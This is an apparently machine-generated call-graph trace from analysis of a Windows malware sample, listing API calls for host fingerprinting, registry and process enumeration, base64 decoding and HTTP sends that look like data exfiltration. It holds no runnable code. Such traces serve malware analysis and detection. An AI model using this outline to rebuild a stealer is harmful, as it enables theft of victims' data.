lstrcpy 14671->14672 14673 6849b2 14672->14673 14674 69a9b0 4 API calls 14673->14674 14675 6849d1 14674->14675 14676 69a8a0 lstrcpy 14675->14676 14677 6849da 14676->14677 14678 69a920 3 API calls 14677->14678 14679 6849f8 14678->14679 14680 69a8a0 lstrcpy 14679->14680 14681 684a01 14680->14681 14683 69a9b0 4 API calls 14681->14683 14682->13703 14684 684a20 14683->14684 14685 69a8a0 lstrcpy 14684->14685 14686 684a29 14685->14686 14687 69a9b0 4 API calls 14686->14687 14688 684a48 14687->14688 14689 69a8a0 lstrcpy 14688->14689 14690 684a51 14689->14690 14691 69a9b0 4 API calls 14690->14691 14692 684a7d 14691->14692 14693 69a920 3 API calls 14692->14693 14694 684a84 14693->14694 14695 69a8a0 lstrcpy 14694->14695 14696 684a8d 14695->14696 14697 684aa3 InternetConnectA 14696->14697 14697->14653 14698 684ad3 HttpOpenRequestA 14697->14698 14700 684b28 14698->14700 14701 684ebe InternetCloseHandle 14698->14701 14702 69a9b0 4 API calls 14700->14702 14701->14653 14703 684b3c 14702->14703 14704 69a8a0 lstrcpy 14703->14704 14705 684b45 14704->14705 14706 69a920 3 API calls 14705->14706 14707 684b63 14706->14707 14708 69a8a0 lstrcpy 14707->14708 14709 684b6c 14708->14709 14710 69a9b0 4 API calls 14709->14710 14711 684b8b 14710->14711 14712 69a8a0 lstrcpy 14711->14712 14713 684b94 14712->14713 14714 69a9b0 4 API calls 14713->14714 14715 684bb5 14714->14715 14716 69a8a0 lstrcpy 14715->14716 14717 684bbe 14716->14717 14718 69a9b0 4 API calls 14717->14718 14719 684bde 14718->14719 14720 69a8a0 lstrcpy 14719->14720 14721 684be7 14720->14721 14722 69a9b0 4 API calls 14721->14722 14723 684c06 14722->14723 14724 69a8a0 lstrcpy 14723->14724 14725 684c0f 14724->14725 14726 69a920 3 API calls 14725->14726 14727 684c2d 14726->14727 14728 69a8a0 lstrcpy 14727->14728 14729 684c36 14728->14729 14730 69a9b0 4 API calls 14729->14730 14731 684c55 14730->14731 14732 69a8a0 lstrcpy 14731->14732 14733 684c5e 14732->14733 14734 69a9b0 4 API calls 14733->14734 14735 684c7d 14734->14735 14736 69a8a0 lstrcpy 14735->14736 14737 684c86 14736->14737 14738 69a920 3 API calls 14737->14738 14739 684ca4 14738->14739 14740 69a8a0 lstrcpy 14739->14740 14741 684cad 14740->14741 14742 69a9b0 4 API calls 14741->14742 14743 684ccc 14742->14743 14744 69a8a0 lstrcpy 14743->14744 14745 684cd5 14744->14745 14746 69a9b0 4 API calls 14745->14746 14747 684cf6 14746->14747 14748 69a8a0 lstrcpy 14747->14748 14749 684cff 14748->14749 14750 69a9b0 4 API calls 14749->14750 14751 684d1f 14750->14751 14752 69a8a0 lstrcpy 14751->14752 14753 684d28 14752->14753 14754 69a9b0 4 API calls 14753->14754 14755 684d47 14754->14755 14756 69a8a0 lstrcpy 14755->14756 14757 684d50 14756->14757 14758 69a920 3 API calls 14757->14758 14759 684d6e 14758->14759 14760 69a8a0 lstrcpy 14759->14760 14761 684d77 14760->14761 14762 69a740 lstrcpy 14761->14762 14763 684d92 14762->14763 14764 69a920 3 API calls 14763->14764 14765 684db3 14764->14765 14766 69a920 3 API calls 14765->14766 14767 684dba 14766->14767 14768 69a8a0 lstrcpy 14767->14768 14769 684dc6 14768->14769 14770 684de7 lstrlen 14769->14770 14771 684dfa 14770->14771 14772 684e03 lstrlen 14771->14772 15709 69aad0 14772->15709 14774 684e13 HttpSendRequestA 14775 684e32 InternetReadFile 14774->14775 14776 684e67 InternetCloseHandle 14775->14776 14781 684e5e 14775->14781 14779 69a800 14776->14779 14778 69a9b0 4 API calls 14778->14781 14779->14701 14780 69a8a0 lstrcpy 14780->14781 14781->14775 14781->14776 14781->14778 14781->14780 15716 69aad0 14782->15716 14784 6917c4 StrCmpCA 14785 6917cf ExitProcess 14784->14785 14787 6917d7 14784->14787 14786 6919c2 14786->13705 14787->14786 14788 6918ad StrCmpCA 14787->14788 14789 6918cf StrCmpCA 14787->14789 14790 69185d StrCmpCA 14787->14790 14791 69187f StrCmpCA 14787->14791 14792 6918f1 StrCmpCA 14787->14792 14793 691951 StrCmpCA 14787->14793 14794 691970 StrCmpCA 14787->14794 14795 691913 StrCmpCA 14787->14795 14796 691932 StrCmpCA 14787->14796 14797 69a820 lstrlen lstrcpy 14787->14797 14788->14787 14789->14787 14790->14787 14791->14787 14792->14787 14793->14787 14794->14787 14795->14787 14796->14787 14797->14787 14799 69a7a0 lstrcpy 14798->14799 14800 685979 14799->14800 14801 6847b0 2 API calls 14800->14801 14802 685985 14801->14802 14803 69a740 lstrcpy 14802->14803 14804 6859ba 14803->14804 14805 69a740 lstrcpy 14804->14805 14806 6859c7 14805->14806 14807 69a740 lstrcpy 14806->14807 14808 6859d4 14807->14808 14809 69a740 lstrcpy 14808->14809 14810 6859e1 14809->14810 14811 69a740 lstrcpy 14810->14811 14812 6859ee InternetOpenA StrCmpCA 14811->14812 14813 685a1d 14812->14813 14814 685fc3 InternetCloseHandle 14813->14814 14815 698b60 3 API calls 14813->14815 14816 685fe0 14814->14816 14817 685a3c 14815->14817 14819 689ac0 4 API calls 14816->14819 14818 69a920 3 API calls 14817->14818 14820 685a4f 14818->14820 14821 685fe6 14819->14821 14822 69a8a0 lstrcpy 14820->14822 14823 69a820 2 API calls 14821->14823 14825 68601f ctype 14821->14825 14827 685a58 14822->14827 14824 685ffd 14823->14824 14826 69a9b0 4 API calls 14824->14826 14829 69a7a0 lstrcpy 14825->14829 14828 686013 14826->14828 14831 69a9b0 4 API calls 14827->14831 14830 69a8a0 lstrcpy 14828->14830 14839 68604f 14829->14839 14830->14825 14832 685a82 14831->14832 14833 69a8a0 lstrcpy 14832->14833 14834 685a8b 14833->14834 14835 69a9b0 4 API calls 14834->14835 14836 685aaa 14835->14836 14837 69a8a0 lstrcpy 14836->14837 14838 685ab3 14837->14838 14840 69a920 3 API calls 14838->14840 14839->13711 14841 685ad1 14840->14841 14842 69a8a0 lstrcpy 14841->14842 14843 685ada 14842->14843 14844 69a9b0 4 API calls 14843->14844 14845 685af9 14844->14845 14846 69a8a0 lstrcpy 14845->14846 14847 685b02 14846->14847 14848 69a9b0 4 API calls 14847->14848 14849 685b21 14848->14849 14850 69a8a0 lstrcpy 14849->14850 14851 685b2a 14850->14851 14852 69a9b0 4 API calls 14851->14852 14853 685b56 14852->14853 14854 69a920 3 API calls 14853->14854 14855 685b5d 14854->14855 14856 69a8a0 lstrcpy 14855->14856 14857 685b66 14856->14857 14858 685b7c InternetConnectA 14857->14858 14858->14814 14859 685bac HttpOpenRequestA 14858->14859 14861 685c0b 14859->14861 14862 685fb6 InternetCloseHandle 14859->14862 14863 69a9b0 4 API calls 14861->14863 14862->14814 14864 685c1f 14863->14864 14865 69a8a0 lstrcpy 14864->14865 14866 685c28 14865->14866 14867 69a920 3 API calls 14866->14867 14868 685c46 14867->14868 14869 69a8a0 lstrcpy 14868->14869 14870 685c4f 14869->14870 14871 69a9b0 4 API calls 14870->14871 14872 685c6e 14871->14872 14873 69a8a0 lstrcpy 14872->14873 14874 685c77 14873->14874 14875 69a9b0 4 API calls 14874->14875 14876 685c98 14875->14876 14877 69a8a0 lstrcpy 14876->14877 14878 685ca1 14877->14878 14879 69a9b0 4 API calls 14878->14879 14880 685cc1 14879->14880 14881 69a8a0 lstrcpy 14880->14881 14882 685cca 14881->14882 14883 69a9b0 4 API calls 14882->14883 14884 685ce9 14883->14884 14885 69a8a0 lstrcpy 14884->14885 14886 685cf2 14885->14886 14887 69a920 3 API calls 14886->14887 14888 685d10 14887->14888 14889 69a8a0 lstrcpy 14888->14889 14890 685d19 14889->14890 14891 69a9b0 4 API calls 14890->14891 14892 685d38 14891->14892 14893 69a8a0 lstrcpy 14892->14893 14894 685d41 14893->14894 14895 69a9b0 4 API calls 14894->14895 14896 685d60 14895->14896 14897 69a8a0 lstrcpy 14896->14897 14898 685d69 14897->14898 14899 69a920 3 API calls 14898->14899 14900 685d87 14899->14900 14901 69a8a0 lstrcpy 14900->14901 14902 685d90 14901->14902 14903 69a9b0 4 API calls 14902->14903 14904 685daf 14903->14904 14905 69a8a0 lstrcpy 14904->14905 14906 685db8 14905->14906 14907 69a9b0 4 API calls 14906->14907 14908 685dd9 14907->14908 14909 69a8a0 lstrcpy 14908->14909 14910 685de2 14909->14910 14911 69a9b0 4 API calls 14910->14911 14912 685e02 14911->14912 14913 69a8a0 lstrcpy 14912->14913 14914 685e0b 14913->14914 14915 69a9b0 4 API calls 14914->14915 14916 685e2a 14915->14916 14917 69a8a0 lstrcpy 14916->14917 14918 685e33 14917->14918 14919 69a920 3 API calls 14918->14919 14920 685e54 14919->14920 14921 69a8a0 lstrcpy 14920->14921 14922 685e5d 14921->14922 14923 685e70 lstrlen 14922->14923 15717 69aad0 14923->15717 14925 685e81 lstrlen GetProcessHeap RtlAllocateHeap 15718 69aad0 14925->15718 14927 685eae lstrlen 14928 685ebe 14927->14928 14929 685ed7 lstrlen 14928->14929 14930 685ee7 14929->14930 14931 685ef0 lstrlen 14930->14931 14932 685f04 14931->14932 14933 685f1a lstrlen 14932->14933 15719 69aad0 14933->15719 14935 685f2a HttpSendRequestA 14936 685f35 InternetReadFile 14935->14936 14937 685f6a InternetCloseHandle 14936->14937 14941 685f61 14936->14941 14937->14862 14939 69a9b0 4 API calls 14939->14941 14940 69a8a0 lstrcpy 14940->14941 14941->14936 14941->14937 14941->14939 14941->14940 14944 691077 14942->14944 14943 691151 14943->13713 14944->14943 14945 69a820 lstrlen lstrcpy 14944->14945 14945->14944 14947 690db7 14946->14947 14948 690f17 14947->14948 14949 690ea4 StrCmpCA 14947->14949 14950 690e27 StrCmpCA 14947->14950 14951 690e67 StrCmpCA 14947->14951 14952 69a820 lstrlen lstrcpy 14947->14952 14948->13721 14949->14947 14950->14947 14951->14947 14952->14947 14957 690f67 14953->14957 14954 691044 14954->13729 14955 690fb2 StrCmpCA 14955->14957 14956 69a820 lstrlen lstrcpy 14956->14957 14957->14954 14957->14955 14957->14956 14959 69a740 lstrcpy 14958->14959 14960 691a26 14959->14960 14961 69a9b0 4 API calls 14960->14961 14962 691a37 14961->14962 14963 69a8a0 lstrcpy 14962->14963 14964 691a40 14963->14964 14965 69a9b0 4 API calls 14964->14965 14966 691a5b 14965->14966 14967 69a8a0 lstrcpy 14966->14967 14968 691a64 14967->14968 14969 69a9b0 4 API calls 14968->14969 14970 691a7d 14969->14970 14971 69a8a0 lstrcpy 14970->14971 14972 691a86 14971->14972 14973 69a9b0 4 API calls 14972->14973 14974 691aa1 14973->14974 14975 69a8a0 lstrcpy 14974->14975 14976 691aaa 14975->14976 14977 69a9b0 4 API calls 14976->14977 14978 691ac3 14977->14978 14979 69a8a0 lstrcpy 14978->14979 14980 691acc 14979->14980 14981 69a9b0 4 API calls 14980->14981 14982 691ae7 14981->14982 14983 69a8a0 lstrcpy 14982->14983 14984 691af0 14983->14984 14985 69a9b0 4 API calls 14984->14985 14986 691b09 14985->14986 14987 69a8a0 lstrcpy 14986->14987 14988 691b12 14987->14988 14989 69a9b0 4 API calls 14988->14989 14990 691b2d 14989->14990 14991 69a8a0 lstrcpy 14990->14991 14992 691b36 14991->14992 14993 69a9b0 4 API calls 14992->14993 14994 691b4f 14993->14994 14995 69a8a0 lstrcpy 14994->14995 14996 691b58 14995->14996 14997 69a9b0 4 API calls 14996->14997 14998 691b76 14997->14998 14999 69a8a0 lstrcpy 14998->14999 15000 691b7f 14999->15000 15001 697500 6 API calls 15000->15001 15002 691b96 15001->15002 15003 69a920 3 API calls 15002->15003 15004 691ba9 15003->15004 15005 69a8a0 lstrcpy 15004->15005 15006 691bb2 15005->15006 15007 69a9b0 4 API calls 15006->15007 15008 691bdc 15007->15008 15009 69a8a0 lstrcpy 15008->15009 15010 691be5 15009->15010 15011 69a9b0 4 API calls 15010->15011 15012 691c05 15011->15012 15013 69a8a0 lstrcpy 15012->15013 15014 691c0e 15013->15014 15720 697690 GetProcessHeap RtlAllocateHeap 15014->15720 15017 69a9b0 4 API calls 15018 691c2e 15017->15018 15019 69a8a0 lstrcpy 15018->15019 15020 691c37 15019->15020 15021 69a9b0 4 API calls 15020->15021 15022 691c56 15021->15022 15023 69a8a0 lstrcpy 15022->15023 15024 691c5f 15023->15024 15025 69a9b0 4 API calls 15024->15025 15026 691c80 15025->15026 15027 69a8a0 lstrcpy 15026->15027 15028 691c89 15027->15028 15727 6977c0 GetCurrentProcess IsWow64Process 15028->15727 15031 69a9b0 4 API calls 15032 691ca9 15031->15032 15033 69a8a0 lstrcpy 15032->15033 15034 691cb2 15033->15034 15035 69a9b0 4 API calls 15034->15035 15036 691cd1 15035->15036 15037 69a8a0 lstrcpy 15036->15037 15038 691cda 15037->15038 15039 69a9b0 4 API calls 15038->15039 15040 691cfb 15039->15040 15041 69a8a0 lstrcpy 15040->15041 15042 691d04 15041->15042 15043 697850 3 API calls 15042->15043 15044 691d14 15043->15044 15045 69a9b0 4 API calls 15044->15045 15046 691d24 15045->15046 15047 69a8a0 lstrcpy 15046->15047 15048 691d2d 15047->15048 15049 69a9b0 4 API calls 15048->15049 15050 691d4c 15049->15050 15051 69a8a0 lstrcpy 15050->15051 15052 691d55 15051->15052 15053 69a9b0 4 API calls 15052->15053 15054 691d75 15053->15054 15055 69a8a0 lstrcpy 15054->15055 15056 691d7e 15055->15056 15057 6978e0 3 API calls 15056->15057 15058 691d8e 15057->15058 15059 69a9b0 4 API calls 15058->15059 15060 691d9e 15059->15060 15061 69a8a0 lstrcpy 15060->15061 15062 691da7 15061->15062 15063 69a9b0 4 API calls 15062->15063 15064 691dc6 15063->15064 15065 69a8a0 lstrcpy 15064->15065 15066 691dcf 15065->15066 15067 69a9b0 4 API calls 15066->15067 15068 691df0 15067->15068 15069 69a8a0 lstrcpy 15068->15069 15070 691df9 15069->15070 15729 697980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15070->15729 15073 69a9b0 4 API calls 15074 691e19 15073->15074 15075 69a8a0 lstrcpy 15074->15075 15076 691e22 15075->15076 15077 69a9b0 4 API calls 15076->15077 15078 691e41 15077->15078 15079 69a8a0 lstrcpy 15078->15079 15080 691e4a 15079->15080 15081 69a9b0 4 API calls 15080->15081 15082 691e6b 15081->15082 15083 69a8a0 lstrcpy 15082->15083 15084 691e74 15083->15084 15731 697a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15084->15731 15087 69a9b0 4 API calls 15088 691e94 15087->15088 15089 69a8a0 lstrcpy 15088->15089 15090 691e9d 15089->15090 15091 69a9b0 4 API calls 15090->15091 15092 691ebc 15091->15092 15093 69a8a0 lstrcpy 15092->15093 15094 691ec5 15093->15094 15095 69a9b0 4 API calls 15094->15095 15096 691ee5 15095->15096 15097 69a8a0 lstrcpy 15096->15097 15098 691eee 15097->15098 15734 697b00 GetUserDefaultLocaleName 15098->15734 15101 69a9b0 4 API calls 15102 691f0e 15101->15102 15103 69a8a0 lstrcpy 15102->15103 15104 691f17 15103->15104 15105 69a9b0 4 API calls 15104->15105 15106 691f36 15105->15106 15107 69a8a0 lstrcpy 15106->15107 15108 691f3f 15107->15108 15109 69a9b0 4 API calls 15108->15109 15110 691f60 15109->15110 15111 69a8a0 lstrcpy 15110->15111 15112 691f69 15111->15112 15738 697b90 15112->15738 15114 691f80 15115 69a920 3 API calls 15114->15115 15116 691f93 15115->15116 15117 69a8a0 lstrcpy 15116->15117 15118 691f9c 15117->15118 15119 69a9b0 4 API calls 15118->15119 15120 691fc6 15119->15120 15121 69a8a0 lstrcpy 15120->15121 15122 691fcf 15121->15122 15123 69a9b0 4 API calls 15122->15123 15124 691fef 15123->15124 15125 69a8a0 lstrcpy 15124->15125 15126 691ff8 15125->15126 15750 697d80 GetSystemPowerStatus 15126->15750 15129 69a9b0 4 API calls 15130 692018 15129->15130 15131 69a8a0 lstrcpy 15130->15131 15132 692021 15131->15132 15133 69a9b0 4 API calls 15132->15133 15134 692040 15133->15134 15135 69a8a0 lstrcpy 15134->15135 15136 692049 15135->15136 15137 69a9b0 4 API calls 15136->15137 15138 69206a 15137->15138 15139 69a8a0 lstrcpy 15138->15139 15140 692073 15139->15140 15141 69207e GetCurrentProcessId 15140->15141 15752 699470 OpenProcess 15141->15752 15144 69a920 3 API calls 15145 6920a4 15144->15145 15146 69a8a0 lstrcpy 15145->15146 15147 6920ad 15146->15147 15148 69a9b0 4 API calls 15147->15148 15149 6920d7 15148->15149 15150 69a8a0 lstrcpy 15149->15150 15151 6920e0 15150->15151 15152 69a9b0 4 API calls 15151->15152 15153 692100 15152->15153 15154 69a8a0 lstrcpy 15153->15154 15155 692109 15154->15155 15757 697e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15155->15757 15158 69a9b0 4 API calls 15159 692129 15158->15159 15160 69a8a0 lstrcpy 15159->15160 15161 692132 15160->15161 15162 69a9b0 4 API calls 15161->15162 15163 692151 15162->15163 15164 69a8a0 lstrcpy 15163->15164 15165 69215a 15164->15165 15166 69a9b0 4 API calls 15165->15166 15167 69217b 15166->15167 15168 69a8a0 lstrcpy 15167->15168 15169 692184 15168->15169 15761 697f60 15169->15761 15172 69a9b0 4 API calls 15173 6921a4 15172->15173 15174 69a8a0 lstrcpy 15173->15174 15175 6921ad 15174->15175 15176 69a9b0 4 API calls 15175->15176 15177 6921cc 15176->15177 15178 69a8a0 lstrcpy 15177->15178 15179 6921d5 15178->15179 15180 69a9b0 4 API calls 15179->15180 15181 6921f6 15180->15181 15182 69a8a0 lstrcpy 15181->15182 15183 6921ff 15182->15183 15774 697ed0 GetSystemInfo wsprintfA 15183->15774 15186 69a9b0 4 API calls 15187 69221f 15186->15187 15188 69a8a0 lstrcpy 15187->15188 15189 692228 15188->15189 15190 69a9b0 4 API calls 15189->15190 15191 692247 15190->15191 15192 69a8a0 lstrcpy 15191->15192 15193 692250 15192->15193 15194 69a9b0 4 API calls 15193->15194 15195 692270 15194->15195 15196 69a8a0 lstrcpy 15195->15196 15197 692279 15196->15197 15776 698100 GetProcessHeap RtlAllocateHeap 15197->15776 15200 69a9b0 4 API calls 15201 692299 15200->15201 15202 69a8a0 lstrcpy 15201->15202 15203 6922a2 15202->15203 15204 69a9b0 4 API calls 15203->15204 15205 6922c1 15204->15205 15206 69a8a0 lstrcpy 15205->15206 15207 6922ca 15206->15207 15208 69a9b0 4 API calls 15207->15208 15209 6922eb 15208->15209 15210 69a8a0 lstrcpy 15209->15210 15211 6922f4 15210->15211 15782 6987c0 15211->15782 15214 69a920 3 API calls 15215 69231e 15214->15215 15216 69a8a0 lstrcpy 15215->15216 15217 692327 15216->15217 15218 69a9b0 4 API calls 15217->15218 15219 692351 15218->15219 15220 69a8a0 lstrcpy 15219->15220 15221 69235a 15220->15221 15222 69a9b0 4 API calls 15221->15222 15223 69237a 15222->15223 15224 69a8a0 lstrcpy 15223->15224 15225 692383 15224->15225 15226 69a9b0 4 API calls 15225->15226 15227 6923a2 15226->15227 15228 69a8a0 lstrcpy 15227->15228 15229 6923ab 15228->15229 15787 6981f0 15229->15787 15231 6923c2 15232 69a920 3 API calls 15231->15232 15233 6923d5 15232->15233 15234 69a8a0 lstrcpy 15233->15234 15235 6923de 15234->15235 15236 69a9b0 4 API calls 15235->15236 15237 69240a 15236->15237 15238 69a8a0 lstrcpy 15237->15238 15239 692413 15238->15239 15240 69a9b0 4 API calls 15239->15240 15241 692432 15240->15241 15242 69a8a0 lstrcpy 15241->15242 15243 69243b 15242->15243 15244 69a9b0 4 API calls 15243->15244 15245 69245c 15244->15245 15246 69a8a0 lstrcpy 15245->15246 15247 692465 15246->15247 15248 69a9b0 4 API calls 15247->15248 15249 692484 15248->15249 15250 69a8a0 lstrcpy 15249->15250 15251 69248d 15250->15251 15252 69a9b0 4 API calls 15251->15252 15253 6924ae 15252->15253 15254 69a8a0 lstrcpy 15253->15254 15255 6924b7 15254->15255 15795 698320 15255->15795 15257 6924d3 15258 69a920 3 API calls 15257->15258 15259 6924e6 15258->15259 15260 69a8a0 lstrcpy 15259->15260 15261 6924ef 15260->15261 15262 69a9b0 4 API calls 15261->15262 15263 692519 15262->15263 15264 69a8a0 lstrcpy 15263->15264 15265 692522 15264->15265 15266 69a9b0 4 API calls 15265->15266 15267 692543 15266->15267 15268 69a8a0 lstrcpy 15267->15268 15269 69254c 15268->15269 15270 698320 17 API calls 15269->15270 15271 692568 15270->15271 15272 69a920 3 API calls 15271->15272 15273 69257b 15272->15273 15274 69a8a0 lstrcpy 15273->15274 15275 692584 15274->15275 15276 69a9b0 4 API calls 15275->15276 15277 6925ae 15276->15277 15278 69a8a0 lstrcpy 15277->15278 15279 6925b7 15278->15279 15280 69a9b0 4 API calls 15279->15280 15281 6925d6 15280->15281 15282 69a8a0 lstrcpy 15281->15282 15283 6925df 15282->15283 15284 69a9b0 4 API calls 15283->15284 15285 692600 15284->15285 15286 69a8a0 lstrcpy 15285->15286 15287 692609 15286->15287 15831 698680 15287->15831 15289 692620 15290 69a920 3 API calls 15289->15290 15291 692633 15290->15291 15292 69a8a0 lstrcpy 15291->15292 15293 69263c 15292->15293 15294 69265a lstrlen 15293->15294 15295 69266a 15294->15295 15296 69a740 lstrcpy 15295->15296 15297 69267c 15296->15297 15298 681590 lstrcpy 15297->15298 15299 69268d 15298->15299 15841 695190 15299->15841 15301 692699 15301->13733 16029 69aad0 15302->16029 15304 685009 InternetOpenUrlA 15308 685021 15304->15308 15305 68502a InternetReadFile 15305->15308 15306 6850a0 InternetCloseHandle InternetCloseHandle 15307 6850ec 15306->15307 15307->13737 15308->15305 15308->15306 16030 6898d0 15309->16030 15311 690759 15312 690a38 15311->15312 15313 69077d 15311->15313 15314 681590 lstrcpy 15312->15314 15316 690799 StrCmpCA 15313->15316 15315 690a49 15314->15315 16206 690250 15315->16206 15318 690843 15316->15318 15319 6907a8 15316->15319 15322 690865 StrCmpCA 15318->15322 15321 69a7a0 lstrcpy 15319->15321 15323 6907c3 15321->15323 15324 690874 15322->15324 15361 69096b 15322->15361 15325 681590 lstrcpy 15323->15325 15326 69a740 lstrcpy 15324->15326 15327 69080c 15325->15327 15329 690881 15326->15329 15330 69a7a0 lstrcpy 15327->15330 15328 69099c StrCmpCA 15331 6909ab 15328->15331 15350 690a2d 15328->15350 15332 69a9b0 4 API calls 15329->15332 15333 690823 15330->15333 15334 681590 lstrcpy 15331->15334 15335 6908ac 15332->15335 15336 69a7a0 lstrcpy 15333->15336 15337 6909f4 15334->15337 15338 69a920 3 API calls 15335->15338 15339 69083e 15336->15339 15340 69a7a0 lstrcpy 15337->15340 15341 6908b3 15338->15341 16033 68fb00 15339->16033 15343 690a0d 15340->15343 15344 69a9b0 4 API calls 15341->15344 15345 69a7a0 lstrcpy 15343->15345 15346 6908ba 15344->15346 15347 690a28 15345->15347 15348 69a8a0 lstrcpy 15346->15348 15350->13741 15361->15328 15681 69a7a0 lstrcpy 15680->15681 15682 681683 15681->15682 15683 69a7a0 lstrcpy 15682->15683 15684 681695 15683->15684 15685 69a7a0 lstrcpy 15684->15685 15686 6816a7 15685->15686 15687 69a7a0 lstrcpy 15686->15687 15688 6815a3 15687->15688 15688->14564 15690 6847c6 15689->15690 15691 684838 lstrlen 15690->15691 15715 69aad0 15691->15715 15693 684848 InternetCrackUrlA 15694 684867 15693->15694 15694->14641 15696 69a740 lstrcpy 15695->15696 15697 698b74 15696->15697 15698 69a740 lstrcpy 15697->15698 15699 698b82 GetSystemTime 15698->15699 15701 698b99 15699->15701 15700 69a7a0 lstrcpy 15702 698bfc 15700->15702 15701->15700 15702->14656 15704 69a931 15703->15704 15705 69a988 15704->15705 15707 69a968 lstrcpy lstrcat 15704->15707 15706 69a7a0 lstrcpy 15705->15706 15708 69a994 15706->15708 15707->15705 15708->14660 15709->14774 15711 689af9 LocalAlloc 15710->15711 15712 684eee 15710->15712 15711->15712 15713 689b14 CryptStringToBinaryA 15711->15713 15712->14662 15712->14665 15713->15712 15714 689b39 LocalFree 15713->15714 15714->15712 15715->15693 15716->14784 15717->14925 15718->14927 15719->14935 15848 6977a0 15720->15848 15723 691c1e 15723->15017 15724 6976c6 RegOpenKeyExA 15725 697704 RegCloseKey 15724->15725 15726 6976e7 RegQueryValueExA 15724->15726 15725->15723 15726->15725 15728 691c99 15727->15728 15728->15031 15730 691e09 15729->15730 15730->15073 15732 697a9a wsprintfA 15731->15732 15733 691e84 15731->15733 15732->15733 15733->15087 15735 697b4d 15734->15735 15736 691efe 15734->15736 15855 698d20 LocalAlloc CharToOemW 15735->15855 15736->15101 15739 69a740 lstrcpy 15738->15739 15740 697bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15739->15740 15749 697c25 15740->15749 15741 697d18 15743 697d28 15741->15743 15744 697d1e LocalFree 15741->15744 15742 697c46 GetLocaleInfoA 15742->15749 15745 69a7a0 lstrcpy 15743->15745 15744->15743 15748 697d37 15745->15748 15746 69a8a0 lstrcpy 15746->15749 15747 69a9b0 lstrcpy lstrlen lstrcpy lstrcat 15747->15749 15748->15114 15749->15741 15749->15742 15749->15746 15749->15747 15751 692008 15750->15751 15751->15129 15753 699493 GetModuleFileNameExA CloseHandle 15752->15753 15754 6994b5 15752->15754 15753->15754 15755 69a740 lstrcpy 15754->15755 15756 692091 15755->15756 15756->15144 15758 697e68 RegQueryValueExA 15757->15758 15759 692119 15757->15759 15760 697e8e RegCloseKey 15758->15760 15759->15158 15760->15759 15762 697fb9 GetLogicalProcessorInformationEx 15761->15762 15763 698029 15762->15763 15764 697fd8 GetLastError 15762->15764 15769 6989f0 2 API calls 15763->15769 15766 698022 15764->15766 15773 697fe3 15764->15773 15767 692194 15766->15767 15770 6989f0 2 API calls 15766->15770 15767->15172 15771 69807b 15769->15771 15770->15767 15771->15766 15772 698084 wsprintfA 15771->15772 15772->15767 15773->15762 15773->15767 15856 6989f0 15773->15856 15859 698a10 GetProcessHeap RtlAllocateHeap 15773->15859 15775 69220f 15774->15775 15775->15186 15777 6989b0 15776->15777 15778 69814d GlobalMemoryStatusEx 15777->15778 15781 698163 __aulldiv 15778->15781 15779 69819b wsprintfA 15780 692289 15779->15780 15780->15200 15781->15779 15783 6987fb GetProcessHeap RtlAllocateHeap wsprintfA 15782->15783 15785 69a740 lstrcpy 15783->15785 15786 69230b 15785->15786 15786->15214 15788 69a740 lstrcpy 15787->15788 15790 698229 15788->15790 15789 698263 15791 69a7a0 lstrcpy 15789->15791 15790->15789 15793 69a9b0 lstrcpy lstrlen lstrcpy lstrcat 15790->15793 15794 69a8a0 lstrcpy 15790->15794 15792 6982dc 15791->15792 15792->15231 15793->15790 15794->15790 15796 69a740 lstrcpy 15795->15796 15797 69835c RegOpenKeyExA 15796->15797 15798 6983ae 15797->15798 15799 6983d0 15797->15799 15800 69a7a0 lstrcpy 15798->15800 15801 6983f8 RegEnumKeyExA 15799->15801 15802 698613 RegCloseKey 15799->15802 15808 6983bd 15800->15808 15803 69843f wsprintfA RegOpenKeyExA 15801->15803 15804 69860e 15801->15804 15805 69a7a0 lstrcpy 15802->15805 15806 6984c1 RegQueryValueExA 15803->15806 15807 698485 RegCloseKey RegCloseKey 15803->15807 15804->15802 15805->15808 15810 6984fa lstrlen 15806->15810 15811 698601 RegCloseKey 15806->15811 15809 69a7a0 lstrcpy 15807->15809 15808->15257 15809->15808 15810->15811 15812 698510 15810->15812 15811->15804 15813 69a9b0 4 API calls 15812->15813 15814 698527 15813->15814 15815 69a8a0 lstrcpy 15814->15815 15816 698533 15815->15816 15817 69a9b0 4 API calls 15816->15817 15818 698557 15817->15818 15819 69a8a0 lstrcpy 15818->15819 15820 698563 15819->15820 15821 69856e RegQueryValueExA 15820->15821 15821->15811 15822 6985a3 15821->15822 15823 69a9b0 4 API calls 15822->15823 15824 6985ba 15823->15824 15825 69a8a0 lstrcpy 15824->15825 15826 6985c6 15825->15826 15827 69a9b0 4 API calls 15826->15827 15828 6985ea 15827->15828 15829 69a8a0 lstrcpy 15828->15829 15830 6985f6 15829->15830 15830->15811 15832 69a740 lstrcpy 15831->15832 15833 6986bc CreateToolhelp32Snapshot Process32First 15832->15833 15834 6986e8 Process32Next 15833->15834 15835 69875d CloseHandle 15833->15835 15834->15835 15840 6986fd 15834->15840 15836 69a7a0 lstrcpy 15835->15836 15839 698776 15836->15839 15837 69a9b0 lstrcpy lstrlen lstrcpy lstrcat 15837->15840 15838 69a8a0 lstrcpy 15838->15840 15839->15289 15840->15834 15840->15837 15840->15838 15842 69a7a0 lstrcpy 15841->15842 15843 6951b5 15842->15843 15844 681590 lstrcpy 15843->15844 15845 6951c6 15844->15845 15860 685100 15845->15860 15847 6951cf 15847->15301 15851 697720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15848->15851 15850 6976b9 15850->15723 15850->15724 15852 697780 RegCloseKey 15851->15852 15853 697765 RegQueryValueExA 15851->15853 15854 697793 15852->15854 15853->15852 15854->15850 15855->15736 15857 6989f9 GetProcessHeap HeapFree 15856->15857 15858 698a0c 15856->15858 15857->15858 15858->15773 15859->15773 15861 69a7a0 lstrcpy 15860->15861 15862 685119 15861->15862 15863 6847b0 2 API calls 15862->15863 15864 685125 15863->15864 16020 698ea0 15864->16020 15866 685184 15867 685192 lstrlen 15866->15867 15868 6851a5 15867->15868 15869 698ea0 4 API calls 15868->15869 15870 6851b6 15869->15870 15871 69a740 lstrcpy 15870->15871 15872 6851c9 15871->15872 15873 69a740 lstrcpy 15872->15873 15874 6851d6 15873->15874 15875 69a740 lstrcpy 15874->15875 15876 6851e3 15875->15876 15877 69a740 lstrcpy 15876->15877 15878 6851f0 15877->15878 15879 69a740 lstrcpy 15878->15879 15880 6851fd InternetOpenA StrCmpCA 